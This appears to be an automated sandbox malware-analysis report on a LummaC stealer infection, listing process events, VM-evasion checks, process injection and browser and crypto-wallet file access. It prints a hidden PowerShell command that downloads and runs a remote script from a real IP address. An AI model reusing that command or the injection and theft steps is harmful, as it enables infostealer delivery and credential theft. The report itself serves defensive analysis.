              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3616, type: MEMORYSTR
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4457Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5346Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep time: -13835058055282155s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 4588Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7204Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: mshta.exe, 00000000.00000003.1676018400.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F}p8
              Source: svchost.exe, 00000003.00000002.2909186871.0000027EDF62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2911362935.0000027EE4A57000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1983377456.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1983377456.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000001.00000002.1779801283.00000000031DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrw
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043B480 LdrInitializeThunk,7_2_0043B480
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: 1.2.powershell.exe.5680f68.0.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
              Source: 1.2.powershell.exe.5680f68.0.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
              Source: 1.2.powershell.exe.5680f68.0.raw.unpack, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
              Bypasses PowerShell execution policy
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
              Compiles code for process injection (via .Net compiler)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.0.csJump to dropped file
              Injects a PE file into a foreign processes
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9F5008Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
